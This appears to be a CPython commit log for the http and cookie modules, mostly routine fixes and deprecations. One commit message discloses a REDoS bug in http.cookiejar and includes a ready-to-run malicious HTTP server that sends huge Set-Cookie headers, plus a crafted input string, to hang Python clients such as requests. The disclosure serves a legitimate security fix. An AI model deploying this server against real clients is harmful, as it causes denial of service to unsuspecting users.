| Commit message (Collapse) | Author | Age | Files | Lines |
|---|
| |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).
LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.
The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to
\d+-\w+-\d+(\s*\s*\s*)$
Therefore, a long sequence of spaces can trigger bad performance.
Matching a malicious string such as
LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")
caused catastrophic backtracking.
The fix removes ambiguity about which \s* should match a particular
space.
You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.
from http.server import BaseHTTPRequestHandler, HTTPServer
def make_set_cookie_value(n_spaces):
spaces = " " * n_spaces
expiry = f"1-c-1{spaces}!"
return f"b;Expires={expiry}"
class Handler(BaseHTTPRequestHandler):
def do_GET(self):
self.log_request(204)
self.send_response_only(204) GH- Don't bother sending Server and Date
n_spaces = (
int(self.path[1:]) GH- Can GET e.g. /100 to test shorter sequences
if len(self.path) > 1 else
65506 GH- Max header line length 65536
)
value = make_set_cookie_value(n_spaces)
for i in range(99): GH- Not necessary, but we can have up to 100 header lines
self.send_header("Set-Cookie", value)
self.end_headers()
if __name__ == "__main__":
HTTPServer(("", 44020), Handler).serve_forever()
This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.
Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :
import http.cookiejar, urllib.request
cj = http.cookiejar.CookieJar()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
r = opener.open("http://localhost:44020/")
The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):
import requests
requests.get("http://localhost:44020/")
* Regression test for http.cookiejar REDoS
If we regress, this test will take a very long time.
* Improve performance of http.cookiejar.ISO_DATE_RE
A string like
"444444" + (" " * 2000) + "A"
could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
(cherry picked from commit 1b779bfb8593739b11cbb988ef82a883ec9d077e)
Co-authored-by: bcaller <bcaller@users.noreply.github.com>
|
| |
|
|
|
|
|
| |
validation and encoding behavior (GH-16448) (GH-16462)
(cherry picked from commit 7774d7831e8809795c64ce27f7df52674581d298)
Co-authored-by: Jason R. Coombs <jaraco@jaraco.com>
|
| |
|
|
|
|
|
|
|
|
| |
Disallow control chars in http URLs in urllib.urlopen. This addresses a potential security problem for applications that do not sanity check their URLs where http request headers could be injected.
Disable https related urllib tests on a build without ssl (GH-13032)
These tests require an SSL enabled build. Skip these tests when python is built without SSL to fix test failures.
Use http.client.InvalidURL instead of ValueError as the new error case's exception. (GH-13044)
Co-Authored-By: Miro Hrončok <miro@hroncok.cz>
|
| |
|
| |
Co-authored-by: Xtreak <tir.karthi@gmail.com>
|
| |
|
|
|
|
|
|
| |
(GH-12260)
Don't send cookies of domain A without Domain attribute to domain B when domain A is a suffix match of domain B while using a cookiejar with `http.cookiejar.DefaultCookiePolicy` policy. Patch by Karthikeyan Singaravelan.
(cherry picked from commit ca7fe5063593958e5efdf90f068582837f07bd14)
Co-authored-by: Xtreak <tir.karthi@gmail.com>
|
| |
|
|
|
|
|
|
| |
with debuglevel=1 only the header keys got printed. With
this change the header values get printed as well and the single
header entries get '\n' as a separator.
(cherry picked from commit 936f03e7fafc28fd6fdfba11d162c776b89c0167)
Co-authored-by: Marco Strigl <mstrigl@suse.com>
|
| |
|
|
|
| |
(cherry picked from commit b36b0a3765bcacb4dcdbf12060e9e99711855da8)
Co-authored-by: ValeriyaSinevich <valeriya.sinevich@phystech.edu>
|
| |
|
|
|
| |
(cherry picked from commit d5a2377c3d70e4143bcbee4a765b3434e21f683a)
Co-authored-by: Berker Peksag <berker.peksag@gmail.com>
|
| |
|
|
|
|
|
|
|
|
|
|
|
|
| |
(#4864)
* [3.6] bpo-32297: Few misspellings found in Python source code comments. (GH-4803)
* Fix multiple typos in code comments
* Add spacing in comments (test_logging.py, test_math.py)
* Fix spaces at the beginning of comments in test_logging.py.
(cherry picked from commit 53f7a7c2814fbfd8a29200926601a32fa48bacb3)
|
| |
|
|
|
| |
regular expression. Deprecation warning is emitted if uses them in the
middle of the regular expression.
|
| |
|
|
|
|
|
| |
The deprecation include manual creation of SSLSocket and certfile/keyfile
(or similar) in ftplib, httplib, imaplib, smtplib, poplib and urllib.
ssl.wrap_socket() is not marked as deprecated yet.
|
| |
|
|
| |
but not in the expressions. Also, require expressions to begin and end with literal curly braces.
|
| |\
| |
| |
| | |
documentation consistent with the code.
|
| | |
| |
| |
| | |
consistent with the code.
|
| | | |
|
| | |
| |
| |
| |
| |
| |
| | |
And most of the tools.
Patch by Emanual Barry, reviewed by me, Serhiy Storchaka, and
Martin Panter.
|
| | | |
|
| | | |
|
| | |
| |
| |
| |
| |
| |
| | |
The previous attempt to determine the file’s Content-Length gave a false
positive for pipes on Windows.
Also, drop the special case for sending zero-length iterable bodies.
|
| |\ \
| |/ |
|
| | | |
|
| | |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| | |
When the body object is a file, its size is no longer determined with
fstat(), since that can report the wrong result (e.g. reading from a pipe).
Instead, determine the size using seek(), or fall back to chunked encoding
for unseekable files.
Also, change the logic for detecting text files to check for TextIOBase
inheritance, rather than inspecting the “mode” attribute, which may not
exist (e.g. BytesIO and StringIO). The Content-Length for text files is no
longer determined ahead of time, because the original logic could have been
wrong depending on the codec and newline translation settings.
Patch by Demian Brecht and Rolf Krahl, with a few tweaks by me.
|
| |\ \
| |/
| |
| | |
http.cookie.time2netscape, confirming the netscape cookie format.
|
| | |
| |
| |
| | |
confirming the netscape cookie format.
|
| |\ \
| |/ |
|
| | |
| |
| |
| | |
Patch by Susumu Koshiba.
|
| |\ \
| |/ |
|
| | |
| |
| |
| | |
Most fixes to Doc/ and Lib/ directories by Ville Skyttä.
|
| |\ \
| |/ |
|
| | | |
|
| | |
| |
| |
| | |
Initial patch by Felix Kaiser.
|
| |\ \
| |/ |
|
| | |
| |
| |
| |
| | |
Based on patch by Philipp Hagemeister. This fixes a regression caused by
revision f4377699fd47.
|
| | | |
|
| | |
| |
| |
| | |
Patch by Xiang Zhang.
|
| |\ \
| |/ |
|
| | | |
|
| | | |
|
| |\ \
| |/ |
|
| | | |
|
| |\ \
| |/ |
|
| | | |
|
| | |
| |
| |
| |
| |
| | |
in BaseHTTPRequestHandler
Initial patch by karlcow.
|
| |\ \
| |/
| |
| | |
datetime.MAXYEAR
|
| | |
| |
| |
| | |
datetime.MAXYEAR
|
| |\ \
| |/ |
|
| | |
| |
| |
| | |
(correcting regression in Python 3.5).
|
| |\ \
| |/ |
|
| | |
| |
| |
| | |
Based on patch by Guido van Rossum.
|
| |\ \
| |/
| |
| |
| | |
to ASCII replacements. Removed UTF-8 BOM from Misc/NEWS.
Original patch by Chris Angelico.
|
